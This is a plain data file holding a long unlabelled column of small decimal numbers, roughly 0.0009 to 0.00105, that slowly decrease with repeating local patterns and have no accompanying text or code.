0.00103991
0.0010399
0.00104416
0.00104417
0.0010399
0.00104868
0.00105295
0.00104868
0.00105295
0.00104868
0.00104868
0.0010487
0.00105293
0.00105295
0.00105295
0.00104869
0.00104868
0.00104417
0.0010399
0.00104416
0.00104417
0.0010399
0.00103112
0.00103537
0.00103539
0.00103113
0.00103539
0.00103113
0.00103112
0.00102661
0.0010266
0.00102233
0.00102661
0.00102234
0.00103111
0.00103539
0.00103112
0.00103539
0.00103111
0.00102661
0.00102659
0.00102235
0.00102234
0.0010266
0.00102661
0.00102234
0.00103112
0.00103537
0.00103539
0.00103113
0.00103539
0.00103113
0.00103112
0.00102661
0.0010266
0.00102233
0.00102661
0.00102233
0.00103111
0.00103539
0.00103112
0.00103539
0.00103111
0.00102661
0.00102659
0.00102235
0.00102233
0.00102659
0.00102661
0.00102234
0.00104868
0.00104416
0.00104868
0.00104416
0.00103111
0.00103539
0.00103539
0.0010354
0.00103111
0.00103111
0.00102657
0.0010224
0.0010266
0.00102234
0.00102237
0.00102654
0.0010266
0.00102658
0.0010224
0.0010266
0.00102234
0.00102237
0.00102654
0.0010266
0.00103115
0.00103538
0.00103532
0.00103112
0.00103535
0.00103118
0.00103112
0.00103115
0.00103538
0.00103532
0.00103112
0.00103535
0.00103118
0.00103113
0.00102662
0.00102233
0.00102233
0.00102233
0.00102661
0.00102661
0.0010266
0.00103112
0.0010266
0.00103112
0.00101356
0.00100905
0.00101356
0.00100904
0.00100906
0.00100477
0.00100477
0.00100906
0.00100905
0.00100477
0.00101359
0.00101776
0.00101783
0.00101357
0.0010178
0.00101357
0.00101363
0.00101359
0.00101776
0.00101782
0.00101356
0.0010178
0.00101357
0.00101362
0.00101355
0.00101784
0.00101784
0.00101784
0.00101355
0.00101355
0.00100902
0.00100479
0.00100905
0.00100485
0.00100904
0.00100481
0.00100898
0.00100901
0.00100478
0.00100904
0.00100484
0.00100904
0.00100481
0.00100898
0.000991484
0.000995999
0.000991483
0.000995997
0.000995988
0.00100027
0.00100027
0.00100028
0.000995992
0.000995991
0.000991456
0.000987282
0.000991484
0.000987222
0.000991479
0.000991423
0.000987249
0.000991454
0.00098728
0.000991481
0.000987222
0.000991478
0.00099142
0.000987247
0.000996033
0.00100026
0.0010002
0.000996004
0.00100023
0.000996006
0.000996065
0.000996031
0.00100026
0.0010002
0.000996001
0.00100023
0.000996005
0.000996064
0.000991496
0.000987208
0.000987207
0.000991492
0.000991492
0.000987204
0.00100906
0.00100904
0.00100478
0.0010048
0.00100906
0.00100904
0.00100478
0.00101356
0.00101784
0.00101357
0.00101784
0.00101356
0.00101356
0.00101358
0.00101784
0.00101782
0.00101357
0.00101784
0.00101358
0.00100906
0.00100478
0.00100904
0.00100906
0.00100478
0.000995998
0.00100028
0.00100026
0.000996018
0.00100027
0.000996002
0.000996014
0.000991491
0.000991479
0.000987213
0.000987214
0.00099149
0.000995997
0.00100027
0.000996005
0.00100027
0.000995998
0.000991492
0.000991474
0.000987216
0.00098723
0.000987214
0.00099149
0.000991478
0.000995998
0.00100027
0.00100026
0.000996018
0.00100027
0.000996002
0.000996011
0.000991491
0.000991479
0.000987213
0.00099149
0.000987214
0.000995997
0.00100027
0.000996005
0.00100027
0.000995996
0.000991491
0.000991473
0.000987215
0.000987228
0.000991491
0.000991476
0.000987214
0.00100906
0.00100478
0.00100477
0.00100906
0.00100906
0.00100477
0.00101359
0.00101776
0.00101782
0.00101357
0.00101357
0.0010178
0.00101363
0.00101359
0.00101776
0.00101782
0.00101356
0.00101362
0.0010178
0.00101357
0.00101355
0.00101784
0.00101784
0.00101355
0.00101784
0.00101356
0.00100902
0.00100479
0.00100905
0.00100485
0.00100904
0.00100898
0.00100481
0.00100902
0.00100479
0.00100904
0.00100484
0.00100898
0.00100904
0.00100481
0.00101356
0.00100905
0.000991484
0.000996
0.000995989
0.00100028
0.00100028
0.00100028
0.000995993
0.000995992
0.000991455
0.00098728
0.000991483
0.000987222
0.00099142
0.00099148
0.000987246
0.000991455
0.000987282
0.000991481
0.000987222
0.000991477
0.000991423
0.000987247
0.000996034
0.00100026
0.0010002
0.000996006
0.000996065
0.00100024
0.000996007
0.000996032
0.00100026
0.0010002
0.000996002
0.00100024
0.000996005
0.000996065
0.000991496
0.000987208
0.000987208
0.000991493
0.000991492
0.000987205
0.000991482
0.000995997
0.00100905
0.00100903
0.00100478
0.00100479
0.00100905
0.00100903
0.00100478
0.00101355
0.00101783
0.00101356
0.00101783
0.00101355
0.00101356
0.00101357
0.00101783
0.00101781
0.00101356
0.00101783
0.00101357
0.00100905
0.00100477
0.00100904
0.00100905
0.00100477
0.000995994
0.00100025
0.00100027
0.000996008
0.00100027
0.000996007
0.000995995
0.000991488
0.000991478
0.00098721
0.000987211
0.000991488
0.000995993
0.00100027
0.000996003
0.00100027
0.000995993
0.000991488
0.000991468
0.000987224
0.000987212
0.00098721
0.000991473
0.000991485
0.000995992
0.00100027
0.00100025
0.000996009
0.00100027
0.000995994
0.000996006
0.000991486
0.000991475
0.000987209
0.000991485
0.00098721
0.000995989
0.00100027
0.000996
0.00100027
0.000995991
0.000991486
0.000991469
0.000987211
0.000987225
0.000991485
0.000991472
0.00098721
0.00100905
0.00100903
0.00100479
0.00100477
0.00100903
0.00100905
0.00100477
0.00101355
0.00101783
0.00101356
0.00101355
0.00101783
0.00101355
0.00101357
0.00101782
0.00101783
0.00101357
0.00101783
0.00101356
0.00100905
0.00100477
0.00100904
0.00100905
0.00100477
0.00100905
0.00100903
0.00100477
0.00100479
0.00100905
0.00100904
0.00100477
0.00101356
0.00101783
0.00101356
0.00101783
0.00101356
0.00101355
0.00101357
0.00101783
0.00101781
0.00101783
0.00101356
0.00101357
0.00100905
0.00100477
0.00100904
0.00100905
0.00100477
0.000995993
0.00100025
0.00100027
0.00099601
0.00100027
0.000996006
0.000995994
0.000991491
0.000991479
0.000987215
0.00099149
0.000987217
0.000995994
0.00100027
0.000996003
0.00100027
0.000995994
0.000991491
0.000991472
0.000987229
0.000987216
0.000991474
0.000991486
0.000987218
0.000995993
0.00100026
0.00100025
0.000996009
0.00100027
0.000995995
0.000996008
0.00099149
0.000991479
0.000987214
0.000991491
0.000987215
0.000995993
0.00100027
0.000996002
0.00100027
0.000995993
0.000991491
0.000991472
0.000987218
0.00098723
0.000991489
0.000991476
0.000987216
0.00100906
0.00100477
0.00100477
0.00100905
0.00100905
0.00100477
0.00101359
0.00101775
0.00101782
0.00101356
0.00101356
0.00101779
0.00101362
0.00101359
0.00101776
0.00101782
0.00101356
0.00101362
0.00101779
0.00101356
0.00101355
0.00101783
0.00101783
0.00101355
0.00101784
0.00101355
0.00100901
0.00100478
0.00100904
0.00100484
0.00100904
0.00100898
0.00100481
0.00100901
0.00100478
0.00100904
0.00100484
0.00100898
0.00100904
0.00100481
0.00101356
0.00100904
0.000991481
0.000995995
0.000995987
0.00100027
0.00100027
0.00100028
0.00099599
0.00099599
0.000991453
0.000987281
0.000991479
0.000987222
0.000991419
0.000991477
0.000987247
0.000991454
0.000987282
0.000991482
0.000987223
0.000991478
0.00099142
0.000987248
0.000996029
0.00100026
0.00100019
0.000995999
0.000996062
0.00100023
0.000996003
0.000996032
0.00100026
0.0010002
0.000996002
0.00100023
0.000996004
0.000996062
0.000991496
0.000987208
0.000987208
0.000991491
0.000991492
0.000987205
0.000991483
0.000995996
0.00100905
0.00100903
0.00100479
0.00100478
0.00100904
0.00100905
0.00100478
0.00101356
0.00101783
0.00101356
0.00101355
0.00101783
0.00101355
0.00101357
0.00101781
0.00101783
0.00101357
0.00101783
0.00101356
0.00100905
0.00100477
0.00100904
0.00100905
0.00100478
0.00100905
0.00100903
0.00100479
0.00100478
0.00100903
0.00100905
0.00100477
0.00101355
0.00101783
0.00101356
0.00101783
0.00101355
0.00101355
0.00101357
0.00101781
0.00101783
0.00101783
0.00101357
0.00101356
0.00100905
0.00100478
0.00100904
0.00100905
0.00100477
0.000995992
0.00100025
0.00100026
0.000996008
0.00100027
0.000996006
0.000995992
0.000991488
0.000991477
0.000987212
0.000991489
0.000987212
0.000995992
0.00100027
0.000996001
0.00100027
0.000995991
0.000991488
0.000991466
0.000987227
0.000987211
0.000991474
0.000991483
0.000987212
0.00099599
0.00100025
0.00100027
0.00099601
0.00100027
0.000996007
0.000995992
0.000991485
0.000991475
0.000987209
0.000991486
0.000987209
0.000995991
0.00100027
0.000996
0.00100027
0.000995992
0.000991485
0.000991469
0.000987225
0.000987211
0.000991472
0.000991484
0.000987209
0.00101356
0.00100904
0.00101356
0.00100904
0.000995983
0.00100027
0.00100027
0.00100027
0.000995987
0.000995986
0.000991452
0.000987282
0.000991481
0.000987222
0.00098725
0.00099142
0.000991477
0.000991452
0.000987279
0.000991479
0.000987222
0.00098725
0.000991418
0.000991476
0.000996027
0.00100026
0.00100019
0.000995999
0.00100023
0.000996061
0.000996001
0.000996026
0.00100025
0.00100019
0.000995998
0.00100023
0.000996059
0.000996001
0.000991494
0.000987207
0.000987207
0.000987205
0.00099149
0.000991489
0.000991483
0.000995996
0.00099148
0.000995995
0.000978436
0.000973921
0.000978435
0.00097392
0.00097393
0.000969644
0.000969643
0.000973927
0.000973927
0.000969641
0.000978467
0.000982634
0.000982697
0.00097844
0.000982671
0.000978441
0.000978497
0.000978467
0.000982634
0.000982695
0.000978439
0.000982671
0.000978441
0.000978498
0.000978423
0.00098271
0.000982709
0.000982713
0.000978426
0.000978426
0.000973889
0.000969659
0.000973919
0.000969718
0.000973913
0.000969685
0.000973856
0.000973888
0.000969657
0.000973919
0.00096972
0.000973913
0.000969683
0.000973856
0.000956354
0.000960869
0.000956355
0.000960872
0.00096086
0.000965146
0.000965146
0.000965149
0.000960862
0.000960863
0.000956325
0.000952151
0.000956352
0.000952091
0.000956348
0.000956292
0.000952116
0.000956325
0.000952151
0.000956354
0.000952092
0.00095635
0.000956291
0.000952117
0.000960903
0.000965133
0.000965071
0.000960874
0.000965108
0.000960876
0.000960935
0.000960902
0.000965132
0.000965072
0.000960875
0.000965107
0.000960877
0.000960935
0.000956367
0.000952077
0.000952078
0.000956363
0.000956363
0.000952074
0.000973923
0.000973905
0.00096965
0.00096966
0.000973922
0.000973908
0.000969647
0.000978428
0.000982704
0.000978437
0.000982705
0.000978427
0.000978428
0.000978448
0.000982705
0.000982689
0.000978431
0.000982705
0.000978442
0.000973923
0.000969645
0.000973911
0.000973922
0.000969647
0.000960868
0.000965143
0.000965129
0.000960885
0.000965145
0.00096087
0.000960881
0.000956362
0.000956349
0.000952084
0.000952084
0.00095636
0.000960868
0.000965144
0.000960875
0.000965145
0.000960868
0.000956361
0.000956341
0.000952084
0.000952095
0.000952083
0.000956359
0.000956344
0.000960865
0.000965141
0.000965122
0.000960885
0.000965141
0.00096087
0.000960878
0.00095636
0.000956348
0.000952083
0.000956359
0.000952084
0.000960864
0.00096514
0.000960872
0.000965141
0.000960864
0.00095636
0.000956344
0.000952086
0.000952098
0.00095636
0.000956346
0.000952084
0.000973928
0.000969642
0.000969642
0.000973925
0.000973925
0.000969639
0.000978464
0.000982633
0.000982693
0.000978435
0.000978438
0.000982667
0.000978497
0.000978464
0.000982634
0.000982694
0.000978437
0.000978498
0.000982667
0.000978439
0.000978421
0.000982708
0.000982708
0.000978424
0.000982711
0.000978424
0.000973886
0.000969658
0.000973915
0.000969715
0.000973911
0.000973854
0.000969682
0.000973887
0.000969656
0.000973916
0.000969718
0.000973855
0.000973911
0.000969682
0.000978434
0.000973919
0.000956353
0.000960867
0.000960857
0.000965145
0.000965145
0.000965149
0.00096086
0.000960861
0.000956322
0.000952149
0.000956351
0.000952089
0.000956289
0.000956346
0.000952115
0.000956322
0.000952149
0.000956352
0.00095209
0.000956347
0.00095629
0.000952115
0.000960902
0.000965131
0.000965067
0.000960872
0.000960934
0.000965106
0.000960874
0.000960902
0.000965132
0.000965069
0.000960875
0.000965107
0.000960876
0.000960935
0.000956363
0.000952075
0.000952075
0.00095636
0.00095636
0.000952072
0.000956355
0.000960871
0.000973921
0.000973906
0.000969649
0.000969661
0.000973922
0.000973908
0.000969646
0.000978427
0.000982703
0.000978437
0.000982704
0.000978428
0.000978426
0.000978446
0.000982702
0.000982686
0.00097843
0.000982702
0.000978441
0.000973921
0.000969646
0.000973911
0.000973921
0.000969646
0.000960867
0.000965127
0.00096514
0.000960886
0.000965143
0.000960881
0.000960869
0.000956364
0.00095635
0.000952085
0.000952087
0.000956363
0.00096087
0.000965146
0.000960877
0.000965146
0.00096087
0.000956363
0.000956347
0.000952099
0.000952088
0.000952087
0.000956347
0.000956361
0.000960866
0.000965141
0.000965123
0.000960886
0.000965139
0.00096087
0.000960881
0.000956363
0.000956351
0.000952086
0.000956362
0.000952087
0.000960866
0.00096514
0.000960877
0.000965141
0.000960867
0.000956361
0.000956346
0.000952088
0.000952099
0.000956362
0.000956346
0.000952085
0.000973929
0.000973911
0.000969668
0.000969654
0.000973914
0.000973926
0.000969654
0.000978434
0.000982708
0.000978441
0.000978432
0.00098271
0.000978434
0.000978451
0.000982694
0.000982709
0.000978448
0.000982712
0.000978435
0.000973929
0.000969652
0.000973915
0.000973927
0.000969654
0.000973923
0.000973911
0.000969651
0.000969662
0.000973924
0.000973909
0.000969648
0.000978428
0.000982707
0.000978437
0.000982707
0.000978428
0.000978429
0.00097845
0.000982709
0.000982693
0.000982708
0.000978434
0.000978446
0.000973923
0.000969646
0.000973913
0.000973923
0.000969647
0.000960871
0.000965133
0.000965145
0.000960889
0.000965148
0.000960887
0.000960872
0.000956364
0.000956351
0.000952083
0.000956363
0.000952085
0.000960871
0.000965147
0.000960878
0.000965148
0.00096087
0.000956364
0.000956345
0.000952097
0.000952085
0.00095635
0.000956361
0.000952085
0.000960866
0.000965143
0.000965126
0.000960887
0.000965142
0.00096087
0.000960881
0.00095636
0.000956349
0.000952081
0.00095636
0.000952083
0.000960865
0.000965142
0.000960874
0.000965141
0.000960865
0.000956361
0.000956343
0.000952084
0.000952095
0.000956359
0.000956345
0.000952083
0.000973928
0.000969643
0.000969643
0.000973925
0.000973926
0.00096964
0.000978464
0.000982633
0.000982695
0.000978435
0.000978438
0.000982668
0.000978498
0.000978465
0.000982636
0.000982695
0.000978436
0.000978497
0.00098267
0.000978439
0.000978421
0.000982709
0.000982709
0.000978424
0.000982712
0.000978424
0.000973886
0.000969656
0.000973914
0.000969717
0.00097391
0.000973855
0.000969682
0.000973886
0.000969658
0.000973916
0.000969715
0.000973853
0.000973913
0.000969682
0.000978433
0.000973918
0.000956356
0.000960871
0.00096086
0.000965146
0.000965146
0.000965149
0.000960863
0.000960862
0.000956323
0.000952151
0.000956354
0.000952094
0.00095629
0.00095635
0.00095212
0.000956322
0.000952152
0.000956352
0.000952091
0.000956348
0.000956291
0.000952117
0.000960902
0.000965132
0.000965067
0.000960875
0.000960935
0.000965104
0.000960877
0.000960902
0.000965131
0.000965068
0.000960873
0.000965105
0.000960877
0.000960934
0.000956367
0.000952079
0.000952078
0.000956363
0.000956363
0.000952075
0.000956355
0.00096087
0.000973919
0.000973902
0.000969658
0.000969647
0.000973903
0.000973919
0.000969643
0.000978426
0.000982705
0.000978437
0.000978426
0.000982705
0.000978426
0.000978445
0.000982689
0.000982703
0.000978441
0.000982704
0.000978429
0.00097392
0.000969644
0.000973911
0.000973919
0.000969644
0.000973919
0.0009739
0.000969659
0.000969644
0.000973906
0.000973916
0.000969643
0.000978425
0.000982701
0.000978437
0.000982701
0.000978426
0.000978425
0.000978445
0.000982687
0.000982701
0.000982701
0.000978442
0.000978427
0.00097392
0.000969645
0.00097391
0.000973919
0.000969645
0.000960864
0.000965123
0.000965139
0.000960884
0.000965138
0.000960881
0.000960867
0.000956361
0.00095635
0.000952086
0.000956362
0.000952086
0.000960865
0.000965141
0.000960875
0.00096514
0.000960866
0.000956361
0.000956346
0.000952101
0.000952087
0.000956348
0.000956358
0.000952087
0.000960863
0.000965121
0.000965138
0.000960884
0.000965138
0.000960877
0.000960867
0.00095636
0.000956347
0.000952085
0.00095636
0.000952085
0.000960863
0.000965139
0.000960872
0.00096514
0.000960865
0.000956359
0.000956346
0.000952102
0.000952088
0.000956346
0.00095636
0.000952086
0.000978433
0.000973918
0.000978432
0.000973916
0.000960856
0.000965142
0.000965142
0.000965146
0.000960859
0.000960859
0.000956324
0.00095215
0.000956352
0.000952091
0.000952118
0.000956289
0.000956349
0.000956324
0.000952151
0.000956351
0.000952091
0.000952117
0.00095629
0.000956348
0.0009609
0.000965128
0.000965067
0.000960873
0.000965103
0.000960932
0.000960874
0.0009609
0.000965128
0.000965066
0.000960871
0.000965102
0.000960933
0.000960873
0.000956366
0.000952076
0.000952076
0.000952074
0.000956362
0.000956361
0.000956353
0.000960869
0.000956352
0.000960867
0.000943303
0.000938787
0.000943304
0.000938788
0.000938798
0.000934512
0.000934512
0.000938795
0.000938795
0.000934509
0.000943333
0.000947503
0.000947564
0.000943307
0.000947537
0.000943308
0.000943366
0.000943334
0.000947503
0.000947566
0.000943308
0.000947539
0.000943309
0.000943367
0.000943291
0.000947578
0.000947579
0.000947581
0.000943294
0.000943294
0.000938755
0.000934526
0.000938785
0.000934585
0.000938781
0.000934551
0.000938724
0.000938756
0.000934527
0.000938786
0.000934585
0.000938781
0.000934552
0.000938725
0.00092122
0.000925737
0.000921222
0.000925737
0.000925728
0.000930014
0.000930015
0.000930019
0.00092573
0.00092573
0.000921192
0.000917017
0.000921219
0.000916959
0.000921215
0.000921159
0.000916984
0.000921193
0.000917018
0.000921221
0.00091696
0.000921216
0.000921159
0.000916983
0.000925772
0.00093
0.000929937
0.000925741
0.000929975
0.000925744
0.000925802
0.000925773
0.000930001
0.000929937
0.000925742
0.000929975
0.000925744
0.000925803
0.000921234
0.000916945
0.000916945
0.00092123
0.00092123
0.000916942
0.000938796
0.000938778
0.000934522
0.000934534
0.000938794
0.00093878
0.00093452
0.0009433
0.000947577
0.000943308
0.000947578
0.0009433
0.0009433
0.000943319
0.000947576
0.000947559
0.000943303
0.000947577
0.000943314
0.000938795
0.000934517
0.000938782
0.000938794
0.000934519
0.000925732
0.00093001
0.000929994
0.00092575
0.00093001
0.000925735
0.000925746
0.000921226
0.000921215
0.000916947
0.000916948
0.000921224
0.000925732
0.00093001
0.000925742
0.000930011
0.000925733
0.000921225
0.000921206
0.00091695
0.000916962
0.000916948
0.000921224
0.000921208
0.000925737
0.000930011
0.000929998
0.000925753
0.000930014
0.000925737
0.000925752
0.00092123
0.000921218
0.000916952
0.000921229
0.000916954
0.000925736
0.000930011
0.000925744
0.000930012
0.000925735
0.00092123
0.000921209
0.00091695
0.000916966
0.000921225
0.000921216
0.000916953
0.000938797
0.00093451
0.00093451
0.000938794
0.000938793
0.000934507
0.000943334
0.000947501
0.000947563
0.000943306
0.000943307
0.000947536
0.000943366
0.000943333
0.000947501
0.000947563
0.000943304
0.000943363
0.000947536
0.000943307
0.000943289
0.000947577
0.000947577
0.000943292
0.000947579
0.000943292
0.000938756
0.000934524
0.000938785
0.000934586
0.00093878
0.000938723
0.00093455
0.000938754
0.000934524
0.000938782
0.000934582
0.00093872
0.00093878
0.000934548
0.0009433
0.000938785
0.000921222
0.000925739
0.000925725
0.000930013
0.000930012
0.000930016
0.000925728
0.000925728
0.000921192
0.000917018
0.000921221
0.000916958
0.000921159
0.000921215
0.000916983
0.000921191
0.000917018
0.000921218
0.000916957
0.000921214
0.000921157
0.000916982
0.00092577
0.000929999
0.000929938
0.000925742
0.000925803
0.000929972
0.000925743
0.000925769
0.000929998
0.000929934
0.00092574
0.000929972
0.000925742
0.000925801
0.000921232
0.000916943
0.000916943
0.000921229
0.000921228
0.00091694
0.00092122
0.000925736
0.000938795
0.000938777
0.00093452
0.000934534
0.000938794
0.00093878
0.00093452
0.000943302
0.000947578
0.000943311
0.00094758
0.000943303
0.000943301
0.000943317
0.000947578
0.00094756
0.000943304
0.000947578
0.000943315
0.000938796
0.000934517
0.000938784
0.000938795
0.000934519
0.000925737
0.000929996
0.000930013
0.000925751
0.000930013
0.000925749
0.00092574
0.00092123
0.000921218
0.000916952
0.000916954
0.000921229
0.000925735
0.00093001
0.000925743
0.000930012
0.000925734
0.000921231
0.000921211
0.000916967
0.000916954
0.000916954
0.000921215
0.000921229
0.000925736
0.000930011
0.000929997
0.000925752
0.000930013
0.000925738
0.000925749
0.000921231
0.000921219
0.000916953
0.00092123
0.000916954
0.000925735
0.000930011
0.000925745
0.000930013
0.000925735
0.00092123
0.000921213
0.000916955
0.000916968
0.000921229
0.000921215
0.000916954
0.000938792
0.000938774
0.000934527
0.000934516
0.000938774
0.00093879
0.000934516
0.000943297
0.000947573
0.000943304
0.000943294
0.000947576
0.000943297
0.000943316
0.000947557
0.000947574
0.00094331
0.000947575
0.0009433
0.000938791
0.000934513
0.000938779
0.000938788
0.000934515
0.000938792
0.000938774
0.000934517
0.000934527
0.00093879
0.000938775
0.000934516
0.000943296
0.000947572
0.000943306
0.000947574
0.000943295
0.000943297
0.000943315
0.000947574
0.000947556
0.000947574
0.000943299
0.00094331
0.000938791
0.000934513
0.00093878
0.000938789
0.000934515
0.000925731
0.00092999
0.000930006
0.000925744
0.000930009
0.000925743
0.000925732
0.000921227
0.000921215
0.000916951
0.000921227
0.000916951
0.000925732
0.000930008
0.000925741
0.000930009
0.000925732
0.000921227
0.000921206
0.000916966
0.000916953
0.000921211
0.000921224
0.000916952
0.000925732
0.000930007
0.000929991
0.000925746
0.000930009
0.000925733
0.000925745
0.000921227
0.000921215
0.000916949
0.000921226
0.00091695
0.000925732
0.000930008
0.000925741
0.000930009
0.000925732
0.000921228
0.000921204
0.000916951
0.000916964
0.000921224
0.000921211
0.000916951
0.000938799
0.000934513
0.000934513
0.000938797
0.000938796
0.000934509
0.000943338
0.000947504
0.000947567
0.000943309
0.000943312
0.000947544
0.000943368
0.000943338
0.000947503
0.000947566
0.000943307
0.000943366
0.000947541
0.00094331
0.000943294
0.000947581
0.000947581
0.000943297
0.000947584
0.000943297
0.000938757
0.000934527
0.000938787
0.000934586
0.000938783
0.000938724
0.000934552
0.000938757
0.000934526
0.000938785
0.000934587
0.000938723
0.000938781
0.000934551
0.000943304
0.000938787
0.000921223
0.000925739
0.000925728
0.000930015
0.000930015
0.000930018
0.000925731
0.000925731
0.000921191
0.000917018
0.000921219
0.000916962
0.000921158
0.000921217
0.000916985
0.000921192
0.000917019
0.000921222
0.00091696
0.000921217
0.000921158
0.000916985
0.00092577
0.000930001
0.000929936
0.000925742
0.000925802
0.000929973
0.000925745
0.000925772
0.000930001
0.000929938
0.000925743
0.000929975
0.000925746
0.000925801
0.000921234
0.000916946
0.000916946
0.000921231
0.000921231
0.000916943
0.000921224
0.00092574
0.000938798
0.000938777
0.000934533
0.000934522
0.000938781
0.000938796
0.00093452
0.000943303
0.00094758
0.00094331
0.000943301
0.000947581
0.000943304
0.000943321
0.000947564
0.000947579
0.000943317
0.000947581
0.000943306
0.000938795
0.000934516
0.000938782
0.000938794
0.000934518
0.000938795
0.000938781
0.00093453
0.000934522
0.00093878
0.000938797
0.000934518
0.000943301
0.000947578
0.000943308
0.000947579
0.000943301
0.000943302
0.000943321
0.000947563
0.00094758
0.000947579
0.000943318
0.000943307
0.000938794
0.000934515
0.000938782
0.000938793
0.000934517
0.000925734
0.000929995
0.000930011
0.000925752
0.000930012
0.000925748
0.000925736
0.000921229
0.000921219
0.000916953
0.000921228
0.000916954
0.000925733
0.000930009
0.000925743
0.00093001
0.000925732
0.000921228
0.000921211
0.000916967
0.000916955
0.000921211
0.000921227
0.000916954
0.000925734
0.000929992
0.000930011
0.000925751
0.00093001
0.000925747
0.000925736
0.000921229
0.000921218
0.000916952
0.000921228
0.000916953
0.000925734
0.000930009
0.000925743
0.00093001
0.000925734
0.000921228
0.000921212
0.000916967
0.000916953
0.000921213
0.000921225
0.000916953
0.000943301
0.000938786
0.000943303
0.000938787
0.000925725
0.000930011
0.000930011
0.000930014
0.000925727
0.000925728
0.000921191
0.000917017
0.000921217
0.000916959
0.000916984
0.000921158
0.000921215
0.000921192
0.00091702
0.000921221
0.00091696
0.000916985
0.000921159
0.000921217
0.000925769
0.000929998
0.000929933
0.000925738
0.000929971
0.000925799
0.000925741
0.00092577
0.000929997
0.000929936
0.000925741
0.000929972
0.000925801
0.000925743
0.000921233
0.000916944
0.000916945
0.000916942
0.000921229
0.00092123
0.000921219
0.000925734
0.000921224
0.000925738
0.000908169
0.000903654
0.000908172
0.000903656
0.000903665
0.000899379
0.000899379
0.000903662
0.000903662
0.000899377
0.000908201
0.00091237
0.000912432
0.000908172
0.000912406
0.000908175
0.000908234
0.000908201
0.00091237
0.000912432
0.000908174
0.000912405
0.000908175
0.000908234
0.000908156
0.000912446
0.000912446
0.000912449
0.00090816
0.00090816
0.000903622
0.000899394
0.000903651
0.000899453
0.000903648
0.000899418
0.000903591
0.000903623
0.000899394
0.000903653
0.000899453
0.000903649
0.000899419
0.000903591
0.00088609
0.000890605
0.000886088
0.000890603
0.000890595
0.000894882
0.000894882
0.000894886
0.000890598
0.000890598
0.000886062
0.000881887
0.000886089
0.00088183
0.000886086
0.000886027
0.000881855
0.000886061
0.000881887
0.000886088
0.000881829
0.000886085
0.000886028
0.000881854
0.00089064
0.000894868
0.000894806
0.00089061
0.000894844
0.000890612
0.000890671
0.000890639
0.000894867
0.000894806
0.000890608
0.000894844
0.000890612
0.000890671
0.000886104
0.000881816
0.000881815
0.000886101
0.0008861
0.000881813
0.000903664
0.000903645
0.000899388
0.000899399
0.000903661
0.000903647
0.000899387
0.000908171
0.000912446
0.000908176
0.000912447
0.00090817
0.000908169
0.000908185
0.000912441
0.000912429
0.000908169
0.000912446
0.000908183
0.000903665
0.000899386
0.000903652
0.000903663
0.000899388
0.000890601
0.000894878
0.000894866
0.00089062
0.000894878
0.000890604
0.00089062
0.000886095
0.000886084
0.000881819
0.000881819
0.000886095
0.000890601
0.000894878
0.00089061
0.000894878
0.000890602
0.000886097
0.000886079
0.000881822
0.000881837
0.000881821
0.000886095
0.000886084
0.000890604
0.000894879
0.000894863
0.00089062
0.000894881
0.000890606
0.000890618
0.000886098
0.000886089
0.000881819
0.000886098
0.000881821
0.000890604
0.000894881
0.000890616
0.000894882
0.000890604
0.000886098
0.00088608
0.000881822
0.000881836
0.000886097
0.000886083
0.000881821
0.000903666
0.000899381
0.00089938
0.000903663
0.000903662
0.000899378
0.0009082
0.000912371
0.00091243
0.000908173
0.000908174
0.000912403
0.000908235
0.0009082
0.00091237
0.00091243
0.000908172
0.000908234
0.000912403
0.000908174
0.000908156
0.000912444
0.000912444
0.00090816
0.000912447
0.00090816
0.000903624
0.000899396
0.000903653
0.000899453
0.00090365
0.000903591
0.00089942
0.000903624
0.000899395
0.000903651
0.000899452
0.000903591
0.000903648
0.00089942
0.000908169
0.000903654
0.000886094
0.000890611
0.000890595
0.000894883
0.000894883
0.000894886
0.000890599
0.000890598
0.000886061
0.000881887
0.000886091
0.00088183
0.000886026
0.000886086
0.000881855
0.000886061
0.000881888
0.00088609
0.000881832
0.000886086
0.000886027
0.000881855
0.00089064
0.000894869
0.000894805
0.000890613
0.00089067
0.000894843
0.000890614
0.00089064
0.000894869
0.000894805
0.00089061
0.000894843
0.000890612
0.000890673
0.000886103
0.000881816
0.000881817
0.0008861
0.0008861
0.000881814
0.000886093
0.000890605
0.000903665
0.000903644
0.000899387
0.000899401
0.00090366
0.000903649
0.000899388
0.000908171
0.000912443
0.000908179
0.000912446
0.00090817
0.00090817
0.000908186
0.000912446
0.000912427
0.000908171
0.000912446
0.000908183
0.000903666
0.000899387
0.000903652
0.000903665
0.000899389
0.000890598
0.000894861
0.000894876
0.000890616
0.000894876
0.000890615
0.000890601
0.000886094
0.000886083
0.000881817
0.000881818
0.000886093
0.000890599
0.000894877
0.000890609
0.000894877
0.000890599
0.000886093
0.000886079
0.000881834
0.000881819
0.000881818
0.000886082
0.000886091
0.000890603
0.000894876
0.000894862
0.000890618
0.00089488
0.000890603
0.000890616
0.0008861
0.000886087
0.000881821
0.000886099
0.000881823
0.000890605
0.000894881
0.000890614
0.000894882
0.000890605
0.000886097
0.000886079
0.000881821
0.000881834
0.000886094
0.000886082
0.000881821
0.000903661
0.000903643
0.000899398
0.000899387
0.000903645
0.00090366
0.000899384
0.000908165
0.000912443
0.000908174
0.000908164
0.000912443
0.000908166
0.000908185
0.000912428
0.000912444
0.00090818
0.000912445
0.00090817
0.00090366
0.000899382
0.000903648
0.000903658
0.000899383
0.000903662
0.000903641
0.000899386
0.0008994
0.000903659
0.000903645
0.000899387
0.000908167
0.000912442
0.000908173
0.000912444
0.000908166
0.000908167
0.000908186
0.000912443
0.000912427
0.000912444
0.000908169
0.00090818
0.000903662
0.000899384
0.000903648
0.000903661
0.000899386
0.000890603
0.000894863
0.000894879
0.000890624
0.000894878
0.000890617
0.000890608
0.000886101
0.000886088
0.000881826
0.0008861
0.000881826
0.000890603
0.000894876
0.000890612
0.000894877
0.000890602
0.0008861
0.000886085
0.00088184
0.000881827
0.000886086
0.0008861
0.000881825
0.000890605
0.000894878
0.000894864
0.000890621
0.000894881
0.000890608
0.000890618
0.000886099
0.000886087
0.000881821
0.000886099
0.000881823
0.000890604
0.000894879
0.000890612
0.00089488
0.000890603
0.000886101
0.000886082
0.000881826
0.000881837
0.000886099
0.000886086
0.000881824
0.000903666
0.00089938
0.00089938
0.000903663
0.000903663
0.000899377
0.000908204
0.00091237
0.000912434
0.000908176
0.000908178
0.000912408
0.000908236
0.000908202
0.000912371
0.000912433
0.000908174
0.000908234
0.000912406
0.000908177
0.000908159
0.000912447
0.000912447
0.000908162
0.000912451
0.000908163
0.000903624
0.000899394
0.000903654
0.000899456
0.000903649
0.000903593
0.000899417
0.000903623
0.000899394
0.000903654
